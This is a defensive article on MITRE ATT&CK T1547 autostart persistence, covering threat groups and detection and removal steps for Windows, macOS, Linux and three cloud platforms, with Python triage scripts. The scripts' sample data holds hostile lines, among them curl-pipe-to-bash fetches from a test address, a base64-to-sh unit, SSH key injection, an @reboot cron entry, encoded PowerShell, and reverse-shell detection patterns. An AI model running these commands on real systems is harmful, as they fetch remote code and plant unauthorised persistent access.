Boot or Logon Autostart Execution (T1547)

MITRE ATT&CK - T1547: Boot or Logon Autostart Execution

MITRE ATT&CK technique T1547, Boot or Logon Autostart Execution, covers the ways adversaries configure a system to run their code automatically when it boots or when a user logs on, so that access survives reboots and logoffs. Below is a summary of groups and incidents associated with the technique, followed by platform-by-platform steps for finding and removing autostart entries.

Notable Attacks and Groups

1. APT28 (Fancy Bear)

  • Timeline: Ongoing since at least the mid-2000s.

  • Details: Associated with Russian intelligence services, APT28 has used registry run keys and startup folders to ensure their malware runs upon system start.

  • Notable Incidents: In 2016, APT28 used this technique in their campaign targeting the Democratic National Committee (DNC).

2. FIN7 (sometimes conflated with the Carbanak group, which uses the same Carbanak malware)

  • Timeline: Active since at least 2013.

  • Details: FIN7 leverages boot or logon autostart techniques, frequently using registry keys to maintain persistence on victim systems.

  • Notable Incidents: April 2017: FIN7 used these techniques in intrusions targeting the hospitality and retail sectors.

3. Lazarus Group

  • Timeline: Active since at least 2009.

  • Details: Linked to North Korea, the Lazarus Group uses boot or logon autostart execution to deploy destructive payloads, often modifying Windows autostart extensibility points.

  • Notable Incidents: In 2017, the WannaCry worm persisted across reboots by adding a randomly named value under HKLM\Software\Microsoft\Windows\CurrentVersion\Run pointing at its dropper (tasksche.exe) and by installing itself as a Windows service (mssecsvc2.0).

4. Turla (Waterbug, Venomous Bear)

  • Timeline: Active since at least 2004.

  • Details: Turla uses various forms of this technique, including new services and registry modifications.

  • Notable Incidents: In 2018, operations against European government agencies involved autostart registry keys to maintain and recover access.

Techniques and Tools

  • Registry Run Keys / Startup Folder (T1547.001): values under HKCU\Software\Microsoft\Windows\CurrentVersion\Run (and RunOnce, and the HKLM equivalents) and shortcuts in the per-user or all-users Startup folder run the referenced command when a user logs on. Run keys fire at logon, not at boot, so an HKCU entry only executes when that account signs in.

  • Other T1547 sub-techniques: Winlogon helper DLLs (Userinit and Shell values), authentication packages and security support providers loaded by LSASS, time providers, port monitors and print processors, Active Setup, shortcut modification, kernel modules and extensions, XDG autostart entries on Linux, and login items on macOS.

  • Scheduled Tasks (catalogued separately as T1053.005): tasks triggered at boot or logon serve the same purpose and are commonly used alongside Run keys.

  • Service Creation (T1543.003 for Windows services, T1543.002 for systemd units): creating or modifying a service so malicious code starts with the operating system.

  • Group Policies: logon scripts (T1037.001) or startup scripts pushed through Group Policy Objects run malicious scripts or binaries at startup or logon across a domain.

Publicly Available Tools

  • Autoruns / autorunsc (Sysinternals): enumerates the Windows autostart extensibility points (Run keys, Startup folders, services, drivers, scheduled tasks, Winlogon entries and more), can hide Microsoft-signed entries, verify code signatures and submit hashes to VirusTotal. It is a defender's enumeration tool; adversaries do not need it to set autostart entries.

  • PersistenceSniper: open-source PowerShell module that scans a local or remote host for known persistence mechanisms and reports the entries it finds.

Windows Environments

  1. Identify Autostart Program Locations:

    • Check Registry: `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` and `RunOnce`, `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` and `RunOnce` (plus the `Wow6432Node` copies on 64-bit systems), and the `Userinit` and `Shell` values under `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`.

    • Check Startup folders: `%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup` (per user) and `%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup` (all users).

    • Task Manager's Startup tab shows only a subset of these locations; use Autoruns for full coverage.

  2. Analyze and Review Entries:

    • Compare against known software and your baseline: check the digital signature and publisher of each target binary and confirm the path is where that product actually installs.

    • Submit the hashes of unknown entries to VirusTotal; an entry whose target no longer exists on disk is worth noting too, since it often marks malware that was relocated or partially cleaned up.

  3. Remove Unauthorized Entries:

    • Record the entry and preserve a copy of the target binary for analysis before deleting anything, then remove the value with `regedit` (or `reg delete`).

    • Use Autoruns to disable (uncheck) or delete entries across all locations at once.

  4. Use Group Policy for Restrictions:

    • Configure policies such as `Do not process the legacy run list`, `Do not process the run once list` and `Run only specified Windows applications`.
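The review in step 2 is tedious by hand once more than a few hosts are involved. The following Python script is an added example (not from the page, MITRE or Sysinternals) of triaging the text that `reg query` prints for the Run keys: it parses the output, works out which program each value actually launches, and scores a few independent indicators (signed proxy launchers such as rundll32 or powershell, user-writable paths, encoded commands, hidden windows). The registry output, value names, paths and the encoded blob are constructed for the example, not captured from a real host, and the indicator lists are a starting point to tune, not a complete detection.

```python
import re
from pathlib import PureWindowsPath
from typing import Dict, List

# Constructed sample of what `reg query` prints for the HKLM and HKCU Run keys.
# Value names, paths and the encoded blob are invented for this example.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Updater    REG_SZ    C:\Users\alice\AppData\Roaming\svc\update.exe
    Helper    REG_SZ    rundll32.exe C:\Users\Public\Libraries\helper.dll,Start
    Sync    REG_SZ    powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
"""

# `reg query` separates value name, type and data with four spaces.
VALUE_RE = re.compile(r"^\s{4}(.+?)\s{4}(REG_[A-Z_]+)\s{4}(.*)$")

# Signed Windows binaries routinely used as a first stage; the interesting
# part of such an entry is what they are told to load or run.
PROXY_LAUNCHERS = {
    "rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
    "powershell.exe", "pwsh.exe", "cmd.exe", "msiexec.exe", "certutil.exe",
}
# Locations a standard user can write to. Plenty of legitimate software
# installs here (OneDrive, for example), so on its own this is a weak signal.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\downloads\\")


def parse_reg_query(text: str) -> List[Dict[str, str]]:
    """Turn `reg query` output into one dict per value, tagged with its key."""
    entries, key = [], None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        match = VALUE_RE.match(line)
        if match and key:
            name, vtype, data = match.groups()
            entries.append({"key": key, "name": name, "type": vtype, "data": data.strip()})
    return entries


def launcher_of(command: str) -> str:
    """Lower-cased basename of the program a Run value starts (quoted or not)."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        exe = command[1:end] if end > 0 else command[1:]
    else:
        exe = command.split(None, 1)[0] if command else ""
    return PureWindowsPath(exe).name.lower()


def triage_entry(entry: Dict[str, str]) -> List[str]:
    """Independent indicators that an entry deserves a closer look."""
    data = entry["data"]
    lowered = data.lower()
    reasons = []
    exe = launcher_of(data)
    if exe in PROXY_LAUNCHERS:
        reasons.append(f"proxy launcher {exe}")
    if any(marker in lowered for marker in USER_WRITABLE):
        reasons.append("references user-writable location")
    if re.search(r"\s-(e|ec|en|enc|encodedcommand)\s", lowered):
        reasons.append("encoded PowerShell command")
    if re.search(r"-w(indowstyle)?\s+hidden", lowered):
        reasons.append("hidden window")
    return reasons


def triage(text: str) -> Dict[str, List[str]]:
    """Map each value name to its indicators (names are unique in the sample)."""
    return {e["name"]: triage_entry(e) for e in parse_reg_query(text)}


def prioritize(text: str) -> Dict[str, List[str]]:
    """Entries with two or more independent indicators go to the top of the queue."""
    return {name: why for name, why in triage(text).items() if len(why) >= 2}


if __name__ == "__main__":
    for name, why in triage(SAMPLE_REG_QUERY).items():
        print(f"{name:22} {'; '.join(why) or 'no indicators'}")
```

On a live host, feed the script the output of `reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"` and its HKCU, RunOnce and Wow6432Node siblings. A single indicator (OneDrive under AppData) is normal; two or more (a proxy launcher pointing at a DLL in a public directory, or an encoded hidden PowerShell command) is what an analyst should open first, and signature verification of the resolved binary is the next step the offline sample cannot perform.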

macOS

  1. Identify Autostart Items:

    • Check `System Settings` -> `General` -> `Login Items` (on older releases `System Preferences` -> `Users & Groups` -> `Login Items`), which also lists the background items third-party apps have registered.

    • Inspect `/Library/LaunchAgents`, `/Library/LaunchDaemons` and `~/Library/LaunchAgents`. Apple's own agents and daemons live under `/System/Library`, so a `com.apple.*` label in one of the third-party directories is suspect.

  2. Review and Vet Autostart Items:

    • Validate items against approved applications.

    • Use `launchctl list` for the current user's loaded agents, and `sudo launchctl list` for system daemons.

  3. Remove Unauthorized Items:

    • Unload the job first: `launchctl bootout gui/$(id -u)/<label>` for a user agent, `sudo launchctl bootout system/<label>` for a daemon (`launchctl unload <plist>` on older releases).

    • Then delete the corresponding `.plist` file; deleting the file alone leaves the job running until the next login or reboot.

  4. Implement Configuration Profiles:

    • Deploy a Managed Login Items configuration profile (`com.apple.servicemanagement` payload, macOS 13 and later) to allow or block launch agents, daemons and login items by label, label prefix, team identifier or bundle identifier, so unmanaged autostart items are refused rather than merely found later.
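Step 2 above asks you to vet each launchd job. The following Python script is an added example (not from the page, MITRE or Apple) of doing that from the plist files themselves: it parses each job with the standard library's plistlib, resolves what it launches, and flags the patterns that distinguish malicious agents from vendor ones (an Apple-style label outside /System/Library, a program in a hidden or user-owned directory, an interpreter run directly, a fetch-and-pipe command line). The three plists, the "com.example" vendor, the user name and the 198.51.100.7 address are constructed for the example; on a real host you would read the files collected from the directories listed in step 1, and plistlib handles binary plists as well as XML.

```python
import plistlib
from pathlib import PurePosixPath
from typing import Dict, List

# Constructed sample plists keyed by where they were collected from. Labels,
# paths and the hypothetical vendor "com.example" are invented for this example.
SAMPLE_PLISTS: Dict[str, bytes] = {
    "/Library/LaunchAgents/com.example.updater.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/Library/Application Support/Example/Updater</string>
    <string>--check</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>""",
    "/Users/alice/Library/LaunchAgents/com.apple.softwareupdate.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.softwareupdate</string>
  <key>ProgramArguments</key><array>
    <string>/bin/bash</string>
    <string>-c</string>
    <string>curl -fsSL http://198.51.100.7/s | bash</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>""",
    "/Users/alice/Library/LaunchAgents/com.user.sync.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.user.sync</string>
  <key>Program</key><string>/Users/alice/Library/.cache/sync</string>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
}

# Apple ships its own agents and daemons only under /System/Library.
APPLE_DIRS = ("/System/Library/LaunchAgents/", "/System/Library/LaunchDaemons/")
# Where installed software normally lives; anything else is worth a look.
TRUSTED_ROOTS = ("/Applications/", "/Library/", "/System/", "/usr/", "/bin/", "/sbin/", "/opt/")
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python", "python3", "perl", "ruby"}


def inspect_plist(path: str, raw: bytes) -> Dict[str, object]:
    """Parse one launchd job and list the properties that make it suspicious."""
    plist = plistlib.loads(raw)
    argv = list(plist.get("ProgramArguments") or [])
    # launchd runs Program if present, otherwise ProgramArguments[0].
    program = str(plist.get("Program") or (argv[0] if argv else ""))
    label = str(plist.get("Label", ""))
    reasons: List[str] = []
    if label.startswith("com.apple.") and not path.startswith(APPLE_DIRS):
        reasons.append("Apple-style label outside /System/Library")
    if program and not program.startswith(TRUSTED_ROOTS):
        reasons.append(f"program outside standard install roots: {program}")
    if any(part.startswith(".") for part in PurePosixPath(program).parts):
        reasons.append("hidden directory in program path")
    if PurePosixPath(program).name in INTERPRETERS:
        reasons.append(f"interpreter launched directly: {PurePosixPath(program).name}")
    joined = " ".join(argv)
    if any(token in joined for token in ("curl ", "wget ", "| bash", "| sh")):
        reasons.append("fetches or pipes remote content")
    return {
        "label": label,
        "program": program,
        # RunAtLoad fires at login; KeepAlive respawns the job whenever it exits.
        "autostart": bool(plist.get("RunAtLoad") or plist.get("KeepAlive")),
        "reasons": reasons,
    }


def audit(plists: Dict[str, bytes]) -> Dict[str, Dict[str, object]]:
    return {path: inspect_plist(path, raw) for path, raw in plists.items()}


def flagged(plists: Dict[str, bytes]) -> List[str]:
    """Paths of jobs with at least one indicator, for the analyst's queue."""
    return sorted(path for path, result in audit(plists).items() if result["reasons"])


if __name__ == "__main__":
    for path, result in audit(SAMPLE_PLISTS).items():
        print(path, "->", "; ".join(result["reasons"]) or "clean")
```

The vendor updater passes every check even though it runs at login, which is the point: autostart itself is not the signal, the combination of who the label claims to be, where the binary lives and what it does on start is. Before removing a flagged job, confirm it is actually loaded with `launchctl list` and capture the program it points at.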

Linux

  1. Inspect Startup Scripts and Services:

    • Check initialization directories: `/etc/init.d/`, `/etc/rc.local`, `/etc/systemd/system/` (including the `*.wants/` symlinks that mark units enabled; `systemctl list-unit-files --state=enabled` lists them), `~/.config/systemd/user/`, `/etc/xdg/autostart/` and `~/.config/autostart/` (XDG autostart, T1547.013), cron (`/etc/cron.d/`, `/var/spool/cron/` and any `@reboot` entries), and shell initialization files such as `/etc/profile.d/` and `~/.bashrc`.

  2. Validate and Investigate Entries:

    • Ensure entries are trusted.

    • Check file ownership, permissions and timestamps with `ls -l` and `stat`; a unit or script writable by non-root users, or modified outside a maintenance window, deserves attention. Verify packaged files against the package database with `rpm -V <pkg>` or `dpkg --verify <pkg>`.

  3. Remove Suspicious Entries:

    • Disable and stop a service in one step with `systemctl disable --now <unit>`; if the unit file lives in `/etc/systemd/system/` and belongs to no package, remove it and run `systemctl daemon-reload`.

    • Remove unauthorized scripts and autostart entries; review each user's crontab with `crontab -l -u <user>`.

  4. Configure Security Policies:

    • Enforce policies with SELinux or AppArmor.
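The systemd checks in steps 1 to 3 above come down to a few file-system facts: which units under /etc/systemd/system are enabled (a symlink in a `*.wants/` directory), what their ExecStart runs and from where, whether the unit file is writable by anyone other than root, and whether an admin-installed unit shares its name with a vendor unit in /usr/lib/systemd/system (the /etc copy takes precedence and silently replaces the real service). The following Python script is an added example (not from the page, MITRE or systemd) that builds a constructed tree of unit files in a scratch directory and audits it with exactly those checks; the unit names, paths and the base64 blob are invented, and pointing `audit_units` at `Path("/")` on a real host runs the same logic against the live configuration.

```python
import os
import shlex
import stat
import tempfile
from pathlib import Path
from typing import Dict, List

# Locations a non-root user controls, or that do not survive a reboot.
SUSPECT_ROOTS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/root/", "/run/user/")
SHELLS = {"sh", "bash", "dash", "zsh"}


def build_sample_root(root: Path) -> None:
    """Lay out a constructed systemd tree: one vendor unit, one clean admin
    unit and two hostile ones. All names and contents are invented."""
    vendor = root / "usr/lib/systemd/system"
    etc = root / "etc/systemd/system"
    wants = etc / "multi-user.target.wants"
    for directory in (vendor, etc, wants):
        directory.mkdir(parents=True, exist_ok=True)
    units = {
        vendor / "cron.service": ("[Service]\nExecStart=/usr/sbin/cron -f\n", 0o644),
        # Same name as the vendor unit: the /etc copy wins and replaces cron.
        # The blob is opaque filler for the decode-and-pipe pattern, never decoded here.
        etc / "cron.service": ("[Service]\nExecStart=/bin/sh -c 'echo Y3VybCBodHRwOi8vMTk4LjUxLjEwMC43L3ggfCBzaA== | base64 -d | sh'\n", 0o644),
        # Binary in tmpfs under a hidden directory, unit file writable by everyone.
        etc / "update-agent.service": ("[Service]\nExecStart=/dev/shm/.x/agent --daemon\nRestart=always\n", 0o666),
        etc / "node-exporter.service": ("[Service]\nExecStart=/usr/local/bin/node_exporter\n", 0o644),
    }
    for path, (text, mode) in units.items():
        path.write_text(text)
        path.chmod(mode)
    # `systemctl enable` creates exactly these symlinks.
    for name in ("cron.service", "update-agent.service", "node-exporter.service"):
        os.symlink(etc / name, wants / name)


def exec_start_of(unit_text: str) -> List[str]:
    """argv of the first ExecStart= line, minus systemd's -, @, :, + and ! prefixes."""
    for line in unit_text.splitlines():
        if line.startswith("ExecStart="):
            return shlex.split(line.split("=", 1)[1].strip().lstrip("-@:+!"))
    return []


def is_enabled(root: Path, unit_name: str) -> bool:
    """Mirror what `systemctl is-enabled` checks: a symlink in some *.wants/ directory."""
    return any((wants / unit_name).is_symlink()
               for wants in (root / "etc/systemd/system").glob("*.wants"))


def inspect_unit(root: Path, unit_path: Path) -> Dict[str, object]:
    argv = exec_start_of(unit_path.read_text())
    program = argv[0] if argv else ""
    reasons: List[str] = []
    # On a real host also compare st_uid with 0; in this scratch tree every file is ours.
    if unit_path.stat().st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("unit file is group/world writable")
    if (root / "usr/lib/systemd/system" / unit_path.name).exists():
        reasons.append("overrides a vendor unit of the same name")
    if program.startswith(SUSPECT_ROOTS):
        reasons.append(f"ExecStart in volatile or user-owned location: {program}")
    if any(part.startswith(".") for part in Path(program).parts):
        reasons.append("hidden directory in ExecStart path")
    if Path(program).name in SHELLS and "-c" in argv:
        reasons.append("shell -c wrapper instead of a binary")
    joined = " ".join(argv)
    if any(token in joined for token in ("base64 -d", "curl ", "wget ", "| sh", "| bash")):
        reasons.append("decodes or fetches its payload at start")
    return {"unit": unit_path.name, "program": program,
            "enabled": is_enabled(root, unit_path.name), "reasons": reasons}


def audit_units(root: Path) -> Dict[str, Dict[str, object]]:
    """Inspect every admin-installed unit under <root>/etc/systemd/system."""
    unit_dir = root / "etc/systemd/system"
    return {p.name: inspect_unit(root, p) for p in sorted(unit_dir.glob("*.service"))}


def run_demo() -> Dict[str, Dict[str, object]]:
    """Build the sample tree in a scratch directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_root(root)
        return audit_units(root)


if __name__ == "__main__":
    for unit, result in run_demo().items():
        state = "enabled" if result["enabled"] else "disabled"
        print(f"{unit:24} {state:9} {'; '.join(result['reasons']) or 'clean'}")
```

The override check is the one most often missed by hand: `systemctl status cron` looks perfectly normal because the service really is called cron, and only `systemctl cat cron` or a look at which file systemd actually loaded reveals that /etc replaced the packaged unit.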

Amazon AWS

  1. Audit IAM Roles and Policies:

    • Review permissions for instance profiles.

  2. Inspect User Data and Initialization Scripts:

    • Retrieve and decode user data (`aws ec2 describe-instance-attribute --instance-id <id> --attribute userData` returns it base64-encoded) and look for commands that fetch remote scripts, add SSH keys or accounts, or install cron and systemd entries. cloud-init runs user-data scripts only on first boot unless configured otherwise, so also check the launch template or AMI the instance came from, since that is where a persistent change has to live.

  3. Remove or Restrict Unauthorized Configurations:

    • Stop the instance, then replace or clear its user data with `aws ec2 modify-instance-attribute` (user data can only be changed on a stopped instance), and fix the launch template or Auto Scaling group as well, or the next launch reintroduces the script.

  4. Use AWS Config and CloudTrail:

    • Monitor changes with AWS Config rules and CloudTrail.

Google Cloud Platform

  1. Examine VM Metadata:

    • Review the `startup-script`, `startup-script-url` and, for Windows VMs, `windows-startup-script-ps1` keys in both instance metadata and project-wide metadata, since project metadata applies to every VM that does not override it. Unlike cloud-init user data, GCE startup scripts run on every boot.

  2. Verify and Vet Scripts:

    • Ensure metadata scripts are approved.

  3. Remove Malicious Metadata Entries:

    • Use `gcloud compute instances remove-metadata <vm> --keys=startup-script` (or `gcloud compute project-info remove-metadata --keys=...` for project-wide entries) to remove them; `gcloud compute instances describe <vm>` shows the current values.

  4. Leverage Security Command Center:

    • Enable the Security Command Center to monitor VM configurations.

Microsoft Azure

  1. Review VM Extensions and Scripts:

    • Check VM extensions and custom scripts via the Azure portal or `az vm extension list -g <rg> --vm-name <vm>`. The Custom Script Extension's `commandToExecute` and `fileUris` settings are readable, but anything placed in `protectedSettings` is write-only and cannot be audited after the fact.

  2. Analyze and Authorize Extensions:

    • Cross-reference the output with approved extension publishers and script sources, and review the Activity Log for `runCommand` operations, which execute arbitrary commands on the VM without installing an extension.

  3. Disable or Remove Unauthorized Extensions:

    • Remove unauthorized extensions with `az vm extension delete -g <rg> --vm-name <vm> -n <name>`; deleting the extension does not undo what its script already did inside the guest, so inspect the VM itself as well.

  4. Monitor with Azure Security Center:

    • Detect configuration drift with Microsoft Defender for Cloud (formerly Azure Security Center) and alert on extension installs and run-command invocations through the Activity Log.
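The AWS, Google Cloud and Azure procedures above all reduce to the same review: pull the bootstrap script the platform will run at boot (EC2 user data, GCE `startup-script` metadata, the Azure Custom Script Extension's `commandToExecute` and `fileUris`) and read it for things a provisioning script has no business doing. The following Python script is an added example (not from the page, MITRE or any cloud provider) that normalises the three sources from the shapes their CLIs return and scans them with one indicator list. All instance IDs, VM names, scripts and the 198.51.100.0/24 (TEST-NET-2) address are constructed for the example; the real inputs would be the JSON from `aws ec2 describe-instance-attribute`, `gcloud compute instances describe --format=json` and `az vm extension list`.

```python
import base64
import re
from typing import Dict, List

# Constructed stand-ins for CLI output; names, IDs and the 198.51.100.0/24
# (TEST-NET-2) address are invented for this example.
BENIGN_USER_DATA = (
    "#!/bin/bash\napt-get update -y\napt-get install -y nginx\nsystemctl enable --now nginx\n"
)
HOSTILE_USER_DATA = (
    "#!/bin/bash\n"
    "curl -fsSL http://198.51.100.7/a.sh | bash\n"
    "echo 'ssh-ed25519 AAAAC3Constructed attacker' >> /root/.ssh/authorized_keys\n"
    "(crontab -l 2>/dev/null; echo '@reboot /var/tmp/.a/run') | crontab -\n"
)
# aws ec2 describe-instance-attribute --instance-id <id> --attribute userData
EC2_SAMPLES = {
    "i-0aaaaaaaaaaaaaaa1": {"UserData": {"Value": base64.b64encode(BENIGN_USER_DATA.encode()).decode()}},
    "i-0bbbbbbbbbbbbbbb2": {"UserData": {"Value": base64.b64encode(HOSTILE_USER_DATA.encode()).decode()}},
}
# gcloud compute instances describe <vm> --format=json  (metadata portion only)
GCE_SAMPLE = {"name": "web-1", "metadata": {"items": [
    {"key": "startup-script", "value": "#! /bin/bash\necho aGVsbG8= | base64 -d > /tmp/x; bash /tmp/x\nusermod -aG sudo backup\n"},
    {"key": "startup-script-url", "value": "http://198.51.100.7/boot.sh"},
]}}
# az vm extension list -g <rg> --vm-name <vm>  (relevant fields only)
AZURE_SAMPLE = [{
    "name": "CustomScriptExtension", "publisher": "Microsoft.Compute",
    "settings": {
        "fileUris": ["http://198.51.100.7/x.ps1"],
        "commandToExecute": "powershell -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    },
}]

# Things a bootstrap script has no business doing. Matched case-insensitively.
INDICATORS = [
    (r"(curl|wget)[^\n|]*\|\s*(ba)?sh", "downloads and pipes a remote script into a shell"),
    (r"base64\s+(-d|--decode)", "decodes a base64 payload"),
    (r"authorized_keys", "writes SSH authorized_keys"),
    (r"@reboot|/etc/systemd/system/|/etc/rc\.local|/etc/cron", "installs persistence that outlives the bootstrap"),
    (r"useradd|usermod\s+-aG\s+(sudo|wheel)|/etc/sudoers", "creates or elevates a local account"),
    (r"/dev/tcp/|\bnc\s+-e|ncat\s+-e", "reverse shell primitive"),
    (r"-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", "encoded PowerShell command"),
]


def scan_text(text: str) -> List[str]:
    return [why for pattern, why in INDICATORS if re.search(pattern, text, re.I)]


def untrusted_uris(uris: List[str]) -> List[str]:
    """Script sources that are not HTTPS Azure Storage or Cloud Storage locations."""
    return [u for u in uris if not re.match(r"^(https://[^/]+\.blob\.core\.windows\.net/|gs://)", u)]


def ec2_user_data(attribute: dict) -> str:
    """The API returns user data base64-encoded in UserData.Value."""
    encoded = (attribute.get("UserData") or {}).get("Value", "")
    return base64.b64decode(encoded).decode("utf-8", "replace") if encoded else ""


def audit(ec2: Dict[str, dict], gce: dict, azure: List[dict]) -> Dict[str, List[str]]:
    findings: Dict[str, List[str]] = {}
    for instance_id, attribute in ec2.items():
        findings[f"ec2:{instance_id}"] = scan_text(ec2_user_data(attribute))
    for item in gce.get("metadata", {}).get("items", []):
        source = f"gce:{gce['name']}/{item['key']}"
        if item["key"] == "startup-script":
            findings[source] = scan_text(item["value"])
        elif item["key"] == "startup-script-url":
            findings[source] = [f"startup script fetched from untrusted URL: {u}"
                                for u in untrusted_uris([item["value"]])]
    for ext in azure:
        # protectedSettings is write-only in the API, so a commandToExecute placed
        # there is invisible here; treat a Custom Script extension whose readable
        # settings are empty as unreviewed rather than clean.
        settings = ext.get("settings") or {}
        reasons = scan_text(settings.get("commandToExecute", ""))
        reasons += [f"fileUri outside trusted storage: {u}" for u in untrusted_uris(settings.get("fileUris", []))]
        findings[f"azure:{ext['name']}"] = reasons
    return findings


if __name__ == "__main__":
    for source, reasons in audit(EC2_SAMPLES, GCE_SAMPLE, AZURE_SAMPLE).items():
        print(f"{source:32} {'; '.join(reasons) or 'no indicators'}")
```

The indicator list deliberately does not flag `systemctl enable` of a package the script just installed, which is what bootstrap scripts are for; it flags what persists independently of the bootstrap (cron `@reboot`, hand-written units, SSH keys, new sudoers) and what hides its intent (encoding, fetch-and-pipe). Review findings next to the platform's change records (CloudTrail, Cloud Audit Logs, the Azure Activity Log) to see who set the script and when.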
